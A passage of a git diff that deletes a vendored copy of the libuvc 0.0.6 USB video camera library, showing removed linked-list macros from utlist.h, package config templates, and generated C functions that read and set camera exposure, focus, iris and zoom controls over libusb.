-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-            if (_ls_q == _ls_oldhead) { _ls_q = NULL; }                                        \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _SV(_ls_e,list); _PREVASGN(_ls_e,list,_ls_tail); _RS(list);                          \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _CASTASGN(list->prev,_ls_tail);                                                          \
-      _CASTASGN(_tmp2,list);                                                                   \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_tmp2); _RS(list);                           \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-/******************************************************************************
- * singly linked list macros (non-circular)                                   *
- *****************************************************************************/
-#define LL_PREPEND(head,add)                                                                   \
-do {                                                                                           \
-  (add)->next = head;                                                                          \
-  head = add;                                                                                  \
-} while (0)
-
-#define LL_APPEND(head,add)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(head) _tmp;                                                                        \
-  (add)->next=NULL;                                                                            \
-  if (head) {                                                                                  \
-    _tmp = head;                                                                               \
-    while (_tmp->next) { _tmp = _tmp->next; }                                                  \
-    _tmp->next=(add);                                                                          \
-  } else {                                                                                     \
-    (head)=(add);                                                                              \
-  }                                                                                            \
-} while (0)
-
-#define LL_DELETE(head,del)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(head) _tmp;                                                                        \
-  if ((head) == (del)) {                                                                       \
-    (head)=(head)->next;                                                                       \
-  } else {                                                                                     \
-    _tmp = head;                                                                               \
-    while (_tmp->next && (_tmp->next != (del))) {                                              \
-      _tmp = _tmp->next;                                                                       \
-    }                                                                                          \
-    if (_tmp->next) {                                                                          \
-      _tmp->next = ((del)->next);                                                              \
-    }                                                                                          \
-  }                                                                                            \
-} while (0)
-
-/* Here are VS2008 replacements for LL_APPEND and LL_DELETE */
-#define LL_APPEND_VS2008(head,add)                                                             \
-do {                                                                                           \
-  if (head) {                                                                                  \
-    (add)->next = head;     /* use add->next as a temp variable */                             \
-    while ((add)->next->next) { (add)->next = (add)->next->next; }                             \
-    (add)->next->next=(add);                                                                   \
-  } else {                                                                                     \
-    (head)=(add);                                                                              \
-  }                                                                                            \
-  (add)->next=NULL;                                                                            \
-} while (0)
-
-#define LL_DELETE_VS2008(head,del)                                                             \
-do {                                                                                           \
-  if ((head) == (del)) {                                                                       \
-    (head)=(head)->next;                                                                       \
-  } else {                                                                                     \
-    char *_tmp = (char*)(head);                                                                \
-    while (head->next && (head->next != (del))) {                                              \
-      head = head->next;                                                                       \
-    }                                                                                          \
-    if (head->next) {                                                                          \
-      head->next = ((del)->next);                                                              \
-    }                                                                                          \
-    {                                                                                          \
-      char **_head_alias = (char**)&(head);                                                    \
-      *_head_alias = _tmp;                                                                     \
-    }                                                                                          \
-  }                                                                                            \
-} while (0)
-#ifdef NO_DECLTYPE
-#undef LL_APPEND
-#define LL_APPEND LL_APPEND_VS2008
-#undef LL_DELETE
-#define LL_DELETE LL_DELETE_VS2008
-#endif
-/* end VS2008 replacements */
-
-#define LL_FOREACH(head,el)                                                                    \
-    for(el=head;el;el=el->next)
-
-#define LL_FOREACH_SAFE(head,el,tmp)                                                           \
-  for((el)=(head);(el) && (tmp = (el)->next, 1); (el) = tmp)
-
-#define LL_SEARCH_SCALAR(head,out,field,val)                                                   \
-do {                                                                                           \
-    LL_FOREACH(head,out) {                                                                     \
-      if ((out)->field == (val)) break;                                                        \
-    }                                                                                          \
-} while(0) 
-
-#define LL_SEARCH(head,out,elt,cmp)                                                            \
-do {                                                                                           \
-    LL_FOREACH(head,out) {                                                                     \
-      if ((cmp(out,elt))==0) break;                                                            \
-    }                                                                                          \
-} while(0) 
-
-/******************************************************************************
- * doubly linked list macros (non-circular)                                   *
- *****************************************************************************/
-#define DL_PREPEND(head,add)                                                                   \
-do {                                                                                           \
- (add)->next = head;                                                                           \
- if (head) {                                                                                   \
-   (add)->prev = (head)->prev;                                                                 \
-   (head)->prev = (add);                                                                       \
- } else {                                                                                      \
-   (add)->prev = (add);                                                                        \
- }                                                                                             \
- (head) = (add);                                                                               \
-} while (0)
-
-#define DL_APPEND(head,add)                                                                    \
-do {                                                                                           \
-  if (head) {                                                                                  \
-      (add)->prev = (head)->prev;                                                              \
-      (head)->prev->next = (add);                                                              \
-      (head)->prev = (add);                                                                    \
-      (add)->next = NULL;                                                                      \
-  } else {                                                                                     \
-      (head)=(add);                                                                            \
-      (head)->prev = (head);                                                                   \
-      (head)->next = NULL;                                                                     \
-  }                                                                                            \
-} while (0);
-
-#define DL_DELETE(head,del)                                                                    \
-do {                                                                                           \
-  if ((del)->prev == (del)) {                                                                  \
-      (head)=NULL;                                                                             \
-  } else if ((del)==(head)) {                                                                  \
-      (del)->next->prev = (del)->prev;                                                         \
-      (head) = (del)->next;                                                                    \
-  } else {                                                                                     \
-      (del)->prev->next = (del)->next;                                                         \
-      if ((del)->next) {                                                                       \
-          (del)->next->prev = (del)->prev;                                                     \
-      } else {                                                                                 \
-          (head)->prev = (del)->prev;                                                          \
-      }                                                                                        \
-  }                                                                                            \
-} while (0);
-
-
-#define DL_FOREACH(head,el)                                                                    \
-    for(el=head;el;el=el->next)
-
-/* this version is safe for deleting the elements during iteration */
-#define DL_FOREACH_SAFE(head,el,tmp)                                                           \
-  for((el)=(head);(el) && (tmp = (el)->next, 1); (el) = tmp)
-
-/* these are identical to their singly-linked list counterparts */
-#define DL_SEARCH_SCALAR LL_SEARCH_SCALAR
-#define DL_SEARCH LL_SEARCH
-
-/******************************************************************************
- * circular doubly linked list macros                                         *
- *****************************************************************************/
-#define CDL_PREPEND(head,add)                                                                  \
-do {                                                                                           \
- if (head) {                                                                                   \
-   (add)->prev = (head)->prev;                                                                 \
-   (add)->next = (head);                                                                       \
-   (head)->prev = (add);                                                                       \
-   (add)->prev->next = (add);                                                                  \
- } else {                                                                                      \
-   (add)->prev = (add);                                                                        \
-   (add)->next = (add);                                                                        \
- }                                                                                             \
-(head)=(add);                                                                                  \
-} while (0)
-
-#define CDL_DELETE(head,del)                                                                   \
-do {                                                                                           \
-  if ( ((head)==(del)) && ((head)->next == (head))) {                                          \
-      (head) = 0L;                                                                             \
-  } else {                                                                                     \
-     (del)->next->prev = (del)->prev;                                                          \
-     (del)->prev->next = (del)->next;                                                          \
-     if ((del) == (head)) (head)=(del)->next;                                                  \
-  }                                                                                            \
-} while (0);
-
-#define CDL_FOREACH(head,el)                                                                   \
-    for(el=head;el;el=(el->next==head ? 0L : el->next)) 
-
-#define CDL_FOREACH_SAFE(head,el,tmp1,tmp2)                                                    \
-  for((el)=(head), ((tmp1)=(head)?((head)->prev):NULL);                                        \
-      (el) && ((tmp2)=(el)->next, 1);                                                          \
-      ((el) = (((el)==(tmp1)) ? 0L : (tmp2))))
-
-#define CDL_SEARCH_SCALAR(head,out,field,val)                                                  \
-do {                                                                                           \
-    CDL_FOREACH(head,out) {                                                                    \
-      if ((out)->field == (val)) break;                                                        \
-    }                                                                                          \
-} while(0) 
-
-#define CDL_SEARCH(head,out,elt,cmp)                                                           \
-do {                                                                                           \
-    CDL_FOREACH(head,out) {                                                                    \
-      if ((cmp(out,elt))==0) break;                                                            \
-    }                                                                                          \
-} while(0) 
-
-#endif /* UTLIST_H */
-
diff --git a/thirdparty/libuvc-0.0.6/libuvc.pc.in b/thirdparty/libuvc-0.0.6/libuvc.pc.in
deleted file mode 100644
index 4f7adb8..0000000
--- a/thirdparty/libuvc-0.0.6/libuvc.pc.in
+++ /dev/null
@@ -1,11 +0,0 @@
-libdir=@CONF_LIBRARY_DIR@
-includedir=@CONF_INCLUDE_DIR@
-
-Name: libuvc
-Description: @libuvc_DESCRIPTION@
-URL: @libuvc_URL@
-Version: @libuvc_VERSION@
-Libs: -L${libdir} -luvc
-Libs.private: -lusb-1.0
-Cflags: -I${includedir}
-Requires: libusb-1.0
diff --git a/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in b/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in
deleted file mode 100644
index e5b0cae..0000000
--- a/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in
+++ /dev/null
@@ -1,3 +0,0 @@
-# - Config file for the libuvc package
-set(libuvc_INCLUDE_DIRS "@CONF_INCLUDE_DIR@")
-set(libuvc_LIBRARIES "@CONF_LIBRARY@")
diff --git a/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in b/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in
deleted file mode 100644
index 00ff766..0000000
--- a/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in
+++ /dev/null
@@ -1,11 +0,0 @@
-set(PACKAGE_VERSION "@libuvc_VERSION@")
-
-# Check whether the requested PACKAGE_FIND_VERSION is compatible
-if("${PACKAGE_VERSION}" VERSION_LESS "${PACKAGE_FIND_VERSION}")
-  set(PACKAGE_VERSION_COMPATIBLE FALSE)
-else()
-  set(PACKAGE_VERSION_COMPATIBLE TRUE)
-  if ("${PACKAGE_VERSION}" VERSION_EQUAL "${PACKAGE_FIND_VERSION}")
-    set(PACKAGE_VERSION_EXACT TRUE)
-  endif()
-endif()
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl-gen.c b/thirdparty/libuvc-0.0.6/src/ctrl-gen.c
deleted file mode 100644
index 30c0ab6..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl-gen.c
+++ /dev/null
@@ -1,2259 +0,0 @@
-/* This is an AUTO-GENERATED file! Update it with the output of `ctrl-gen.py def`. */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-
-/** @ingroup ctrl
- * @brief Reads the SCANNING_MODE control.
- * @param devh UVC device handle
- * @param[out] mode 0: interlaced, 1: progressive
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_scanning_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_SCANNING_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *mode = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SCANNING_MODE control.
- * @param devh UVC device handle
- * @param mode 0: interlaced, 1: progressive
- */
-uvc_error_t uvc_set_scanning_mode(uvc_device_handle_t *devh, uint8_t mode) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = mode;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_SCANNING_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads camera's auto-exposure mode.
- * 
- * See uvc_set_ae_mode() for a description of the available modes.
- * @param devh UVC device handle
- * @param[out] mode 1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture priority mode
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_ae_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_AE_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *mode = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets camera's auto-exposure mode.
- * 
- * Cameras may support any of the following AE modes:
- *  * UVC_AUTO_EXPOSURE_MODE_MANUAL (1) - manual exposure time, manual iris
- *  * UVC_AUTO_EXPOSURE_MODE_AUTO (2) - auto exposure time, auto iris
- *  * UVC_AUTO_EXPOSURE_MODE_SHUTTER_PRIORITY (4) - manual exposure time, auto iris
- *  * UVC_AUTO_EXPOSURE_MODE_APERTURE_PRIORITY (8) - auto exposure time, manual iris
- * 
- * Most cameras provide manual mode and aperture priority mode.
- * @param devh UVC device handle
- * @param mode 1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture priority mode
- */
-uvc_error_t uvc_set_ae_mode(uvc_device_handle_t *devh, uint8_t mode) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = mode;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_AE_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Checks whether the camera may vary the frame rate for exposure control reasons.
- * See uvc_set_ae_priority() for a description of the `priority` field.
- * @param devh UVC device handle
- * @param[out] priority 0: frame rate must remain constant; 1: frame rate may be varied for AE purposes
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_ae_priority(uvc_device_handle_t *devh, uint8_t* priority, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_AE_PRIORITY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *priority = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Chooses whether the camera may vary the frame rate for exposure control reasons.
- * A `priority` value of zero means the camera may not vary its frame rate. A value of 1
- * means the frame rate is variable. This setting has no effect outside of the `auto` and
- * `shutter_priority` auto-exposure modes.
- * @param devh UVC device handle
- * @param priority 0: frame rate must remain constant; 1: frame rate may be varied for AE purposes
- */
-uvc_error_t uvc_set_ae_priority(uvc_device_handle_t *devh, uint8_t priority) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = priority;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_AE_PRIORITY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Gets the absolute exposure time.
- * 
- * See uvc_set_exposure_abs() for a description of the `time` field.
- * @param devh UVC device handle
- * @param[out] time 
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_exposure_abs(uvc_device_handle_t *devh, uint32_t* time, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *time = DW_TO_INT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the absolute exposure time.
- * 
- * The `time` parameter should be provided in units of 0.0001 seconds (e.g., use the value 100
- * for a 10ms exposure period). Auto exposure should be set to `manual` or `shutter_priority`
- * before attempting to change this setting.
- * @param devh UVC device handle
- * @param time 
- */
-uvc_error_t uvc_set_exposure_abs(uvc_device_handle_t *devh, uint32_t time) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  INT_TO_DW(time, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the exposure time relative to the current setting.
- * @param devh UVC device handle
- * @param[out] step number of steps by which to change the exposure time, or zero to set the default exposure time
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_exposure_rel(uvc_device_handle_t *devh, int8_t* step, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *step = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the exposure time relative to the current setting.
- * @param devh UVC device handle
- * @param step number of steps by which to change the exposure time, or zero to set the default exposure time
- */
-uvc_error_t uvc_set_exposure_rel(uvc_device_handle_t *devh, int8_t step) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = step;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the distance at which an object is optimally focused.
- * @param devh UVC device handle
- * @param[out] focus focal target distance in millimeters
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_abs(uvc_device_handle_t *devh, uint16_t* focus, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the distance at which an object is optimally focused.
- * @param devh UVC device handle
- * @param focus focal target distance in millimeters
- */
-uvc_error_t uvc_set_focus_abs(uvc_device_handle_t *devh, uint16_t focus) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(focus, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] focus_rel TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_rel(uvc_device_handle_t *devh, int8_t* focus_rel, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus_rel = data[0];
-    *speed = data[1];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_RELATIVE control.
- * @param devh UVC device handle
- * @param focus_rel TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_focus_rel(uvc_device_handle_t *devh, int8_t focus_rel, uint8_t speed) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  data[0] = focus_rel;
-  data[1] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_SIMPLE control.
- * @param devh UVC device handle
- * @param[out] focus TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_simple_range(uvc_device_handle_t *devh, uint8_t* focus, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_SIMPLE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_SIMPLE control.
- * @param devh UVC device handle
- * @param focus TODO
- */
-uvc_error_t uvc_set_focus_simple_range(uvc_device_handle_t *devh, uint8_t focus) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = focus;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_SIMPLE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_AUTO control.
- * @param devh UVC device handle
- * @param[out] state TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_auto(uvc_device_handle_t *devh, uint8_t* state, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_AUTO_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *state = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_AUTO control.
- * @param devh UVC device handle
- * @param state TODO
- */
-uvc_error_t uvc_set_focus_auto(uvc_device_handle_t *devh, uint8_t state) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = state;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_AUTO_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the IRIS_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] iris TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_iris_abs(uvc_device_handle_t *devh, uint16_t* iris, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_IRIS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *iris = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the IRIS_ABSOLUTE control.
- * @param devh UVC device handle
- * @param iris TODO
- */
-uvc_error_t uvc_set_iris_abs(uvc_device_handle_t *devh, uint16_t iris) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(iris, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_IRIS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the IRIS_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] iris_rel TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_iris_rel(uvc_device_handle_t *devh, uint8_t* iris_rel, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_IRIS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *iris_rel = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the IRIS_RELATIVE control.
- * @param devh UVC device handle
- * @param iris_rel TODO
- */
-uvc_error_t uvc_set_iris_rel(uvc_device_handle_t *devh, uint8_t iris_rel) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = iris_rel;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_IRIS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ZOOM_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] focal_length TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_zoom_abs(uvc_device_handle_t *devh, uint16_t* focal_length, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ZOOM_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focal_length = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ZOOM_ABSOLUTE control.
- * @param devh UVC device handle
- * @param focal_length TODO
- */
-uvc_error_t uvc_set_zoom_abs(uvc_device_handle_t *devh, uint16_t focal_length) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(focal_length, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ZOOM_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
